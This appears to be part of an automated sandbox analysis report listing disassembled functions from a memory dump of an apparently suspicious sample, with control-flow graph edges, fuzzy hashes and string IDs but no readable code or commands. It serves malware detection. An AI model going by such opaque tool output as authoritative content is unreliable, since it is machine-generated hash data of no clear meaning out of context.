                                                                                    Function 00EC8490 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1912 ec8490-ec897e 1987 ec8984-ec8994 1912->1987 1988 ec8ed0-ec8f05 1912->1988 1987->1988 1989 ec899a-ec89aa 1987->1989 1993 ec8f07-ec8f0c 1988->1993 1994 ec8f11-ec8f2f 1988->1994 1989->1988 1990 ec89b0-ec89c0 1989->1990 1990->1988 1992 ec89c6-ec89d6 1990->1992 1992->1988 1995 ec89dc-ec89ec 1992->1995 1996 ec8ff6-ec8ffb 1993->1996 2006 ec8fa6-ec8fb2 1994->2006 2007 ec8f31-ec8f3b 1994->2007 1995->1988 1997 ec89f2-ec8a02 1995->1997 1997->1988 1999 ec8a08-ec8a18 1997->1999 1999->1988 2000 ec8a1e-ec8a2e 1999->2000 2000->1988 2002 ec8a34-ec8a44 2000->2002 2002->1988 2003 ec8a4a-ec8a5a 2002->2003 2003->1988 2005 ec8a60-ec8ecf 2003->2005 2012 ec8fc9-ec8fd5 2006->2012 2013 ec8fb4-ec8fc0 2006->2013 2007->2006 2011 ec8f3d-ec8f49 2007->2011 2019 ec8f6e-ec8f71 2011->2019 2020 ec8f4b-ec8f56 2011->2020 2022 ec8fec-ec8fee 2012->2022 2023 ec8fd7-ec8fe3 2012->2023 2013->2012 2021 ec8fc2-ec8fc7 2013->2021 2024 ec8f88-ec8f94 2019->2024 2025 ec8f73-ec8f7f 2019->2025 2020->2019 2033 ec8f58-ec8f62 2020->2033 2021->1996 2022->1996 2023->2022 2031 ec8fe5-ec8fea 2023->2031 2026 ec8ffc-ec901e 2024->2026 2027 ec8f96-ec8f9d 2024->2027 2025->2024 2037 ec8f81-ec8f86 2025->2037 2038 ec902e 2026->2038 2039 ec9020 2026->2039 2027->2026 2032 ec8f9f-ec8fa4 2027->2032 2031->1996 2032->1996 2033->2019 2044 ec8f64-ec8f69 2033->2044 2037->1996 2042 ec9030-ec9031 2038->2042 2039->2038 2041 ec9027-ec902c 2039->2041 2041->2042 2044->1996
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $q$$q
                                                                                    • API String ID: 0-3126353813
                                                                                    • Opcode ID: 68f302170314eb51491af4c18226e4254a41d8689cbdb87ba9a8641f0a2195c6
                                                                                    • Instruction ID: 3824a7966c252870b91c15a45322545196bc93547ddfccd02b1d67a781a89ac0
                                                                                    • Opcode Fuzzy Hash: 68f302170314eb51491af4c18226e4254a41d8689cbdb87ba9a8641f0a2195c6
                                                                                    • Instruction Fuzzy Hash: 7C52E134A00218CFEB24DBA4C950B9EBB73EF98304F1081ADD10AAB765DF355E469F61
                                                                                    Function 00EC5F38 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2380 ec5f38-ec5f5a 2381 ec5f5c-ec5f60 2380->2381 2382 ec5f70-ec5f7b 2380->2382 2383 ec5f88-ec5f8f 2381->2383 2384 ec5f62-ec5f6e 2381->2384 2385 ec5f81-ec5f83 2382->2385 2386 ec6023-ec604f 2382->2386 2388 ec5faf-ec5fb8 2383->2388 2389 ec5f91-ec5f98 2383->2389 2384->2382 2384->2383 2387 ec601b-ec6020 2385->2387 2393 ec6056-ec60ae 2386->2393 2487 ec5fba call ec5f38 2388->2487 2488 ec5fba call ec5f2a 2388->2488 2389->2388 2390 ec5f9a-ec5fa5 2389->2390 2392 ec5fab-ec5fad 2390->2392 2390->2393 2392->2387 2412 ec60bd-ec60cf 2393->2412 2413 ec60b0-ec60b6 2393->2413 2394 ec5fc0-ec5fc2 2396 ec5fca-ec5fd2 2394->2396 2397 ec5fc4-ec5fc8 2394->2397 2399 ec5fd4-ec5fd9 2396->2399 2400 ec5fe1-ec5fe3 2396->2400 2397->2396 2398 ec5fe5-ec6004 call ec69a0 2397->2398 2406 ec6019 2398->2406 2407 ec6006-ec600f 2398->2407 2399->2400 2400->2387 2406->2387 2484 ec6011 call ecafad 2407->2484 2485 ec6011 call ecaeba 2407->2485 2486 ec6011 call ecaef0 2407->2486 2409 ec6017 2409->2387 2415 ec60d5-ec60d9 2412->2415 2416 ec6163-ec6165 2412->2416 2413->2412 2417 ec60e9-ec60f6 2415->2417 2418 ec60db-ec60e7 2415->2418 2482 ec6167 call ec62f0 2416->2482 2483 ec6167 call ec6300 2416->2483 2426 ec60f8-ec6102 2417->2426 2418->2426 2419 ec616d-ec6173 2420 ec617f-ec6186 2419->2420 2421 ec6175-ec617b 2419->2421 2424 ec617d 2421->2424 2425 ec61e1-ec6240 2421->2425 2424->2420 2441 ec6247-ec626b 2425->2441 2429 ec612f-ec6133 2426->2429 2430 ec6104-ec6113 2426->2430 2431 ec613f-ec6143 2429->2431 2432 ec6135-ec613b 2429->2432 2438 ec6115-ec611c 2430->2438 2439 ec6123-ec612d 2430->2439 2431->2420 2437 ec6145-ec6149 2431->2437 2435 ec613d 2432->2435 2436 ec6189-ec61da 2432->2436 2435->2420 2436->2425 2440 ec614f-ec6161 2437->2440 2437->2441 2438->2439 2439->2429 2440->2420 2449 ec626d-ec626f 2441->2449 2450 ec6271-ec6273 2441->2450 2452 ec62e9-ec62ec 2449->2452 2454 ec6284-ec6286 2450->2454 2455 ec6275-ec6279 2450->2455 2458 ec6288-ec628c 2454->2458 2459 ec6299-ec629f 2454->2459 2456 ec627f-ec6282 2455->2456 2457 ec627b-ec627d 2455->2457 2456->2452 2457->2452 2462 ec628e-ec6290 2458->2462 2463 ec6292-ec6297 2458->2463 2464 ec62ca-ec62cc 2459->2464 2465 ec62a1-ec62c8 2459->2465 2462->2452 2463->2452 2467 ec62d3-ec62d5 2464->2467 2465->2467 2471 ec62db-ec62dd 2467->2471 2472 ec62d7-ec62d9 2467->2472 2473 ec62df-ec62e4 2471->2473 2474 ec62e6 2471->2474 2472->2452 2473->2452 2474->2452 2482->2419 2483->2419 2484->2409 2485->2409 2486->2409 2487->2394 2488->2394
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hq$Hq
                                                                                    • API String ID: 0-925789375
                                                                                    • Opcode ID: bf45bf2d44994ab322ffb044804184b084749fe2c76ede19f813a02d361a3d91
                                                                                    • Instruction ID: a86fada9c9fd93937d74202fa8d864b3f5d4abb9f4bd96f49d0f61a05f6a9fd9
                                                                                    • Opcode Fuzzy Hash: bf45bf2d44994ab322ffb044804184b084749fe2c76ede19f813a02d361a3d91
                                                                                    • Instruction Fuzzy Hash: 01B1DF307046148FDB299F34D954B6F7BA2AF88314F18952DE906DB3A1DB36CC42E7A1
                                                                                    Function 00EC6498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2489 ec6498-ec64a5 2490 ec64ad-ec64af 2489->2490 2491 ec64a7-ec64ab 2489->2491 2493 ec66c0-ec66c7 2490->2493 2491->2490 2492 ec64b4-ec64bf 2491->2492 2494 ec66c8 2492->2494 2495 ec64c5-ec64cc 2492->2495 2498 ec66cd-ec66e0 2494->2498 2496 ec6661-ec6667 2495->2496 2497 ec64d2-ec64e1 2495->2497 2500 ec666d-ec6671 2496->2500 2501 ec6669-ec666b 2496->2501 2497->2498 2499 ec64e7-ec64f6 2497->2499 2510 ec6718-ec671a 2498->2510 2511 ec66e2-ec6705 2498->2511 2507 ec64f8-ec64fb 2499->2507 2508 ec650b-ec650e 2499->2508 2502 ec66be 2500->2502 2503 ec6673-ec6679 2500->2503 2501->2493 2502->2493 2503->2494 2505 ec667b-ec667e 2503->2505 2505->2494 2509 ec6680-ec6695 2505->2509 2512 ec64fd-ec6500 2507->2512 2513 ec651a-ec6520 2507->2513 2508->2513 2514 ec6510-ec6513 2508->2514 2531 ec66b9-ec66bc 2509->2531 2532 ec6697-ec669d 2509->2532 2515 ec671c-ec672e 2510->2515 2516 ec672f-ec6736 2510->2516 2533 ec670e-ec6712 2511->2533 2534 ec6707-ec670c 2511->2534 2517 ec6506 2512->2517 2518 ec6601-ec6607 2512->2518 2523 ec6538-ec6555 2513->2523 2524 ec6522-ec6528 2513->2524 2519 ec6515 2514->2519 2520 ec6566-ec656c 2514->2520 2528 ec662c-ec6639 2517->2528 2526 ec661f-ec6629 2518->2526 2527 ec6609-ec660f 2518->2527 2519->2528 2529 ec656e-ec6574 2520->2529 2530 ec6584-ec6596 2520->2530 2559 ec655e-ec6561 2523->2559 2535 ec652c-ec6536 2524->2535 2536 ec652a 2524->2536 2526->2528 2537 ec6611 2527->2537 2538 ec6613-ec661d 2527->2538 2552 ec664d-ec664f 2528->2552 2553 ec663b-ec663f 2528->2553 2540 ec6578-ec6582 2529->2540 2541 ec6576 2529->2541 2554 ec6598-ec65a4 2530->2554 2555 ec65a6-ec65c9 2530->2555 2531->2493 2542 ec66af-ec66b2 2532->2542 2543 ec669f-ec66ad 2532->2543 2533->2510 2534->2510 2535->2523 2536->2523 2537->2526 2538->2526 2540->2530 2541->2530 2542->2494 2547 ec66b4-ec66b7 2542->2547 2543->2494 2543->2542 2547->2531 2547->2532 2557 ec6653-ec6656 2552->2557 2553->2552 2558 ec6641-ec6645 2553->2558 2564 ec65f1-ec65ff 2554->2564 2555->2494 2566 ec65cf-ec65d2 2555->2566 2557->2494 2561 ec6658-ec665b 2557->2561 2558->2494 2560 ec664b 2558->2560 2559->2528 2560->2557 2561->2496 2561->2497 2564->2528 2566->2494 2568 ec65d8-ec65ea 2566->2568 2568->2564
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,q$,q
                                                                                    • API String ID: 0-1667412543
                                                                                    • Opcode ID: 64ac8eb1c4705fc282050ded5e6c7d21a581276dd3f1ffc4ff2ff6896f7807f9
                                                                                    • Instruction ID: 30471cf9e223261d1b4357dc1b2b5c7dd748d02cd98a14acb6b34c2ed4828680
                                                                                    • Opcode Fuzzy Hash: 64ac8eb1c4705fc282050ded5e6c7d21a581276dd3f1ffc4ff2ff6896f7807f9
                                                                                    • Instruction Fuzzy Hash: 09817D34A00505DFCB14CF69C684EAABBF2BF89318B24956DD415EB365DB32EC42CB61
                                                                                    Function 00ECAEBA Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$(oq
                                                                                    • API String ID: 0-1396055846
                                                                                    • Opcode ID: c5eaf7209964f9afa3947564ab05ac129b6f87c6abcd6f8f7d72ab61928c1bf9
                                                                                    • Instruction ID: 2791389b34b4f448c8c2fe67634112b89fa5b585ecd98df868f54c35f8d15e3a
                                                                                    • Opcode Fuzzy Hash: c5eaf7209964f9afa3947564ab05ac129b6f87c6abcd6f8f7d72ab61928c1bf9
                                                                                    • Instruction Fuzzy Hash: DD41D331B042088FC7159B74A955BAE7BF2EFC9314B18506DE516EB2A1DB368C03DB61
                                                                                    Function 00EC9D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'q$4'q
                                                                                    • API String ID: 0-1467158625
                                                                                    • Opcode ID: 87e04496bcb2808b4c3fd2a00c645f963b01a7c43adcc031d832df012f297c25
                                                                                    • Instruction ID: 9dec0d78fd6b49d67fc190a7344468228b795dcd7999db116275341e7cb4d50e
                                                                                    • Opcode Fuzzy Hash: 87e04496bcb2808b4c3fd2a00c645f963b01a7c43adcc031d832df012f297c25
                                                                                    • Instruction Fuzzy Hash: A0F0CD353002046FD7081BA6A854B7BBBCBEFCC3A1B148029B94AD7351DE72CC0283D0
                                                                                    Function 00EC0C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRq
                                                                                    • API String ID: 0-3187445251
                                                                                    • Opcode ID: 973c734886a17f6749a7969b14b0bba87bbbe965fb0f5013aa37010c56096b55
                                                                                    • Instruction ID: 3db45cefdffbc5f63fc3316f6c7c86945e11c5addc87ea04262fbe7f1af87adc
                                                                                    • Opcode Fuzzy Hash: 973c734886a17f6749a7969b14b0bba87bbbe965fb0f5013aa37010c56096b55
                                                                                    • Instruction Fuzzy Hash: DE52AA78901219CFCB64EF64ED94B9EBBB2FB48301F1085A9D409A7369DB706D86CF50
                                                                                    Function 00EC0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRq
                                                                                    • API String ID: 0-3187445251
                                                                                    • Opcode ID: 1170a8f9dff9fee61c7a4de5e41c2d5829c2ab51a8c743816726e02138e0b090
                                                                                    • Instruction ID: 1c09de9d8d5136283b9b22e129f1a2688ced2d8e1f1619814921f1bfaeda4755
                                                                                    • Opcode Fuzzy Hash: 1170a8f9dff9fee61c7a4de5e41c2d5829c2ab51a8c743816726e02138e0b090
                                                                                    • Instruction Fuzzy Hash: 4652BB78901219CFCB64EF64ED94B9EBBB2FB48301F1085A9D409A7369DB706D86CF50
                                                                                    Function 06708A6C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(00000000), ref: 06708BAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1d5bf26d7219ff86f7862a57dbf1197ea4aac05f898028ab08eaef5eea428de5
                                                                                    • Instruction ID: 58a4f686e219c941dd7e328d0b73c18d2e476a29dbdd353997e0e761d9767105
                                                                                    • Opcode Fuzzy Hash: 1d5bf26d7219ff86f7862a57dbf1197ea4aac05f898028ab08eaef5eea428de5
                                                                                    • Instruction Fuzzy Hash: BB115CB8E00209CFEB44DBA8D884AADBBF5FF88314F148165E844E7381D671DD41CB61
                                                                                    Function 00ECE007 Relevance: .7, Instructions: 654COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 85f25894b55df1709df0302fc8819237ea3a43920293c07e66130574f35bf8bf
                                                                                    • Instruction ID: a9555d3356f77c9fead3c13454e537a37af40e03d1fe2edbfcdd771d5149838e
                                                                                    • Opcode Fuzzy Hash: 85f25894b55df1709df0302fc8819237ea3a43920293c07e66130574f35bf8bf
                                                                                    • Instruction Fuzzy Hash: B512997582174BCFD6406B30FAAD2AABA62FF5F3373056C20F45BC01A5DB754489AB21
                                                                                    Function 00ECE018 Relevance: .6, Instructions: 647COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0eff975730f97eceaea0f40a0bc12ff39b5022c3dd5ee31beadb8c12175188b2
                                                                                    • Instruction ID: c3b9f842663eda338314a11d4cbd228505ca6e3fe5b6d9078ed2b7df95ed261f
                                                                                    • Opcode Fuzzy Hash: 0eff975730f97eceaea0f40a0bc12ff39b5022c3dd5ee31beadb8c12175188b2
                                                                                    • Instruction Fuzzy Hash: F112997582174BCFD6402B30FAAD2AEBA62FF5F3373056C10F45BC01A5DB754489AA61
                                                                                    Function 00EC80D8 Relevance: .2, Instructions: 201COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26a4752af228af352b1de7d4b5682228bfee2944deb5e99202046bb54a8b9c66
                                                                                    • Instruction ID: a1b90535f1f86124ad1fb81f910f348ea48aad2375196278d20819c94075c953
                                                                                    • Opcode Fuzzy Hash: 26a4752af228af352b1de7d4b5682228bfee2944deb5e99202046bb54a8b9c66
                                                                                    • Instruction Fuzzy Hash: 78713E347005058FCB19DF68CB98FAA7BE6AF59714B1910AAE801EB371DB72DC42CB50
                                                                                    Function 00ECF3F1 Relevance: .2, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fe5e16f4f79355618a54c45c989f08635bb43e1391b044c0a74112ce7784a73
                                                                                    • Instruction ID: b963c83b14147464b4d935903ada87ee55a0ece8a33275036ac28f9e553b816b
                                                                                    • Opcode Fuzzy Hash: 0fe5e16f4f79355618a54c45c989f08635bb43e1391b044c0a74112ce7784a73
                                                                                    • Instruction Fuzzy Hash: 7A612174D00318CFDB24DFA4D954BAEBBB2FF88301F208129D806AB295DB356A46CF50
                                                                                    Function 00ECD548 Relevance: .1, Instructions: 140COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67435593d14a7396b670c1fa394aec94c8fb62d87cdec8ede12323dab4ff0131
                                                                                    • Instruction ID: 30b6419c64cb3c8b59271f1e6afa121c12a095632fb314800c17f2db6a45c9ff
                                                                                    • Opcode Fuzzy Hash: 67435593d14a7396b670c1fa394aec94c8fb62d87cdec8ede12323dab4ff0131
                                                                                    • Instruction Fuzzy Hash: C8518474E01218DFDB44DFA9D984A9DBBF2FF89310F248169E809AB364DB31A941CF54
                                                                                    Function 00EC41A0 Relevance: .1, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd6188c262152e553f64033f6130f5966ec1710ba0d7ae25e02c1b9b28b5182d
                                                                                    • Instruction ID: bb16c8cd568d8b8ee3713b7c83be55bfb47cfd2df691b2f3083935edb70c816e
                                                                                    • Opcode Fuzzy Hash: cd6188c262152e553f64033f6130f5966ec1710ba0d7ae25e02c1b9b28b5182d
                                                                                    • Instruction Fuzzy Hash: E8516F74E01308DFCB08DFA9D594A9DBBF2FF89310B209469E815AB365DB35A842CF50
                                                                                    Function 00ECA303 Relevance: .1, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e638c78ce0d54b94b75620dcd446d400a7b3364eca7244ed089af3726a6e0cf8
                                                                                    • Instruction ID: 82253ce314edcd4cf543460a96b541bad3e9bfca5db863924a005326371dcd7c
                                                                                    • Opcode Fuzzy Hash: e638c78ce0d54b94b75620dcd446d400a7b3364eca7244ed089af3726a6e0cf8
                                                                                    • Instruction Fuzzy Hash: AA41D031A0024DCFCF15CFA8C958BDDBBB2BF45318F088169E915AB2A1D372D916CB61
                                                                                    Function 00EC9C30 Relevance: .1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd16e8266453ae795aa53daf977e02b9db1ea3f43cdb71fcaba2c5aaf6b1a290
                                                                                    • Instruction ID: 13f6743f02ca5bba7251f6c9088231c823c16dc82d9bada30501313e2354866f
                                                                                    • Opcode Fuzzy Hash: cd16e8266453ae795aa53daf977e02b9db1ea3f43cdb71fcaba2c5aaf6b1a290
                                                                                    • Instruction Fuzzy Hash: C5418F306102458FDB00CF68C948F6A7BB6FF49314F14846AE909EB356D736DC02DBA1
                                                                                    Function 00EC5658 Relevance: .1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ce1fae6716e0f30116bdb7c49827239440f27ea0b9abdd2086cc74a437eaacdb
                                                                                    • Instruction ID: 7f0f7776affe093c0d51562b679e521d6070135512e6565adaf13873b1463eca
                                                                                    • Opcode Fuzzy Hash: ce1fae6716e0f30116bdb7c49827239440f27ea0b9abdd2086cc74a437eaacdb
                                                                                    • Instruction Fuzzy Hash: 4031B33120060DDFCF059F64D954AAE3B62FB88354F104429F95597255CB3ADDA2EBB0
                                                                                    Function 00EC8370 Relevance: .1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2966c16fb921a43154f2058554925284aac4d7c872b97002bbcce7117d7acd0
                                                                                    • Instruction ID: 1c906e0cbc917780764014854878aa3fa87bfb6f99ae56c281e804f49d601987
                                                                                    • Opcode Fuzzy Hash: e2966c16fb921a43154f2058554925284aac4d7c872b97002bbcce7117d7acd0
                                                                                    • Instruction Fuzzy Hash: 93212E313082024FCB1957398B54F3E3AA3BFC6349B14502DD862EB2A9DE26CC03E791
                                                                                    Function 00EC8380 Relevance: .1, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9fea10930cc18904ebf13c095defc13aa688b2d3ec0b84f81e894978059afb0
                                                                                    • Instruction ID: a4da8fcf95b3282759f195d787b296e7997e6f21c275d2676c053e0153ca0f68
                                                                                    • Opcode Fuzzy Hash: d9fea10930cc18904ebf13c095defc13aa688b2d3ec0b84f81e894978059afb0
                                                                                    • Instruction Fuzzy Hash: FC21ED303042164BDB18562A8B54B3E3687BFC535DF24903DD822EB3A8DE6ACC43E391
                                                                                    Function 00EC28F0 Relevance: .1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a7250957ba04800b517de08229cf1f1d19fcff689fbb9077e9a234152ee7ee24
                                                                                    • Instruction ID: 3e58c6cc0a2dc210d0d67b2561368719c98f76583496bfe1cf70c9cdba30bd43
                                                                                    • Opcode Fuzzy Hash: a7250957ba04800b517de08229cf1f1d19fcff689fbb9077e9a234152ee7ee24
